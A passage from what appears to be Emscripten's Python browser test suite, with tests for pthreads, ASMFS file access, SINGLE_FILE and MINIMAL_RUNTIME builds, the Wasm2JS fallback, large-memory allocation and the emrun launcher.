self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_delete(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
ensure_dir('dirrey')
shutil.copyfile(test_file('asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest_exit('asmfs/hello_file.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(test_file('asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest_exit('asmfs/read_file_twice.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
self.btest_exit('asmfs/fopen_write.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_close(self):
self.btest_exit(test_file('unistd', 'close.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
self.btest_exit(test_file('unistd', 'access.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest_exit(test_file('unistd', 'unlink.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-DNO_SYMLINK=1'])
@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
self.btest_exit('asmfs/relative_paths.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest(test_file('pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', test_file('canvas_animate_resize_shell.html'), '-s', 'GL_DEBUG', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest(test_file('pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS'] + modularize + opts)
# Tests that a pthreads build of -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_pthread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule']]:
self.btest(test_file('pthread', 'hello_thread.c'), expected='1', args=['-s', 'MINIMAL_RUNTIME', '-s', 'USE_PTHREADS'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(test_file('pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(test_file('pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS'])
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest(test_file('pthread', 'test_pthread_reltime.cpp'), expected='3', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([test_file('pthread', 'hello_thread.c'), '-s', 'USE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'])
shutil.copyfile(test_file('pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'EXIT_RUNTIME', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-s', 'SINGLE_FILE'])
create_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-s', 'SINGLE_FILE'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-s', 'MINIMAL_RUNTIME', '-s', 'SINGLE_FILE', '-s', 'WASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE', '-s', 'ENVIRONMENT=web', '-O2', '--closure=1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [test_file('browser_test_hello_world.c'), '-o', 'test.js', '-s', 'SINGLE_FILE']
if not wasm_enabled:
args += ['-s', 'WASM=0']
self.compile_btest(args)
create_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
self.compile_btest([test_file('pthread', 'test_pthread_atomics.cpp'), '-o', 'test.js', '-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
create_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?0')
def test_access_file_after_heap_resize(self):
create_file('test.txt', 'hello from file')
self.compile_btest([test_file('access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.compile_btest([test_file('access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_file('main.cpp', r'''
int main() {
REPORT_RESULT(0);
return 0;
}
''')
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(test_file('pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'EXPORTED_RUNTIME_METHODS=[print]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-s', 'MODULARIZE'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
  # also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest(test_file('emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(test_file('emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(test_file('emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(test_file('emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_emscripten_set_immediate(self):
self.btest(test_file('emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(test_file('emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(test_file('emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(test_file('emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-s', 'ASYNCIFY'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(test_file('emscripten_console_log.c'), '0', args=['--pre-js', test_file('emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(test_file('emscripten_throw_number.c'), '0', args=['--pre-js', test_file('emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(test_file('emscripten_throw_string.c'), '0', args=['--pre-js', test_file('emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure=1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1'])
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1', '-s', 'WASM=0'] + minimal_runtime)
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1', '-s', 'MINIMAL_RUNTIME'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1'], ['-s', 'SINGLE_FILE'], ['-s', 'WASM=0', '-s', 'SINGLE_FILE']]:
for modularize in [[], ['-s', 'MODULARIZE']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure=1'], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure', '1']]:
self.btest(test_file('small_hello_world.c'), '0', args=args + ['-s', 'MINIMAL_RUNTIME'])
@requires_threads
def test_offset_converter(self, *args):
try:
self.btest_exit(test_file('browser', 'test_offset_converter.c'), assert_returncode=1, args=['-s', 'USE_OFFSET_CONVERTER', '-gsource-map', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
except Exception as e:
# dump the wasm file; this is meant to help debug #10539 on the bots
print(self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), 'test.wasm', '-g', '--print', '-all'], stdout=PIPE).stdout)
raise e
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest(test_file('browser', 'test_emscripten_unwind_to_js_event_loop.c'), '1', args=['-s', 'NO_EXIT_RUNTIME'])
def test_wasm2js_fallback(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
      # Then disable WebAssembly support in the VM and try again; it should still work via the Wasm2JS fallback.
html = open('test.html', 'r').read()
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
open('test.html', 'w').write(html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
# Restore the .wasm.js file, then corrupt the .wasm file, that should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_system(self):
self.btest(test_file('system.c'), '0')
# Tests that it is possible to hook into/override a symbol defined in a system library.
@requires_graphics_hardware
def test_override_system_js_lib_symbol(self):
# This test verifies it is possible to override a symbol from WebGL library.
# When WebGL is implicitly linked in, the implicit linking should happen before any user --js-libraries, so that they can adjust
# the behavior afterwards.
self.btest(test_file('test_override_system_js_lib_symbol.c'),
expected='5121',
args=['--js-library', test_file('test_override_system_js_lib_symbol.js')])
# When WebGL is explicitly linked to in strict mode, the linking order on command line should enable overriding.
self.btest(test_file('test_override_system_js_lib_symbol.c'),
expected='5121',
args=['-s', 'AUTO_JS_LIBRARIES=0', '-lwebgl.js', '--js-library', test_file('test_override_system_js_lib_symbol.js')])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4gb(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('browser', 'test_4GB.cpp', js_engines=[config.V8_ENGINE])
# Tests that emmalloc supports up to 4GB Wasm heaps.
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_4gb(self):
self.btest(test_file('mem_growth.cpp'),
expected='-65536', # == 4*1024*1024*1024 - 65536 casted to signed
args=['-s', 'MALLOC=emmalloc', '-s', 'ABORTING_MALLOC=0', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'MAXIMUM_MEMORY=4GB'])
# Test that it is possible to malloc() a huge 3GB memory block in 4GB mode using emmalloc.
# Also test emmalloc-memvalidate and emmalloc-memvalidate-verbose build configurations.
@no_firefox('no 4GB support yet')
def test_emmalloc_3GB(self):
def test(args):
self.btest(test_file('alloc_3gb.cpp'),
expected='0',
args=['-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ALLOW_MEMORY_GROWTH=1'] + args)
test(['-s', 'MALLOC=emmalloc'])
test(['-s', 'MALLOC=emmalloc-debug'])
test(['-s', 'MALLOC=emmalloc-memvalidate'])
test(['-s', 'MALLOC=emmalloc-memvalidate-verbose'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_memgrowth(self, *args):
self.btest(test_file('browser', 'emmalloc_memgrowth.cpp'), expected='0', args=['-s', 'MALLOC=emmalloc', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'ABORTING_MALLOC=0', '-s', 'ASSERTIONS=2', '-s', 'MINIMAL_RUNTIME=1', '-s', 'MAXIMUM_MEMORY=4GB'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_2gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('browser', 'test_2GB_fail.cpp', js_engines=[config.V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ABORTING_MALLOC=0']
self.do_run_in_out_file_test('browser', 'test_4GB_fail.cpp', js_engines=[config.V8_ENGINE])
@disabled("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-s', 'ASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
# the specific symptom of the hang that was fixed is that the test hangs
    # at some point, using 0% CPU. Often that occurred in 0-200 iterations, but
# you may want to adjust "ITERATIONS".
self.btest(test_file('pthread', 'test_pthread_proxy_hammer.cpp'),
expected='0',
args=['-s', 'USE_PTHREADS', '-O2', '-s', 'PROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
def test_assert_failure(self):
self.btest(test_file('browser', 'test_assert_failure.c'), 'abort:Assertion failed: false && "this is a test"')
EMRUN = path_from_root('emrun')
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([EMRUN, '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([EMRUN, '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_no_browser(self):
# Test --no_browser mode where we have to take care of launching the browser ourselves
# and then killing emrun when we are done.
if not has_browser():
self.skipTest('need a browser')
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
proc = subprocess.Popen([EMRUN, '--no_browser', '.', '--port=3333'], stdout=PIPE)
try:
if EMTEST_BROWSER:
print('Starting browser')
browser_cmd = shlex.split(EMTEST_BROWSER)
browser = subprocess.Popen(browser_cmd + ['http://localhost:3333/hello_world.html'])
try:
while True:
stdout = proc.stdout.read()
if b'Dumping out file' in stdout:
break
finally:
print('Terminating browser')
browser.terminate()
browser.wait()
finally:
print('Terminating emrun server')
proc.terminate()
proc.wait()
def test_emrun(self):
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the
# browser that is launched will have that directory as startup directory, and the browser will
# not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to
# delete it. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [EMRUN, '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
# Verify that trying to pass argument to the page without the `--` separator will
# generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
stdout = open(self.in_dir('stdout.txt'), 'r').read()
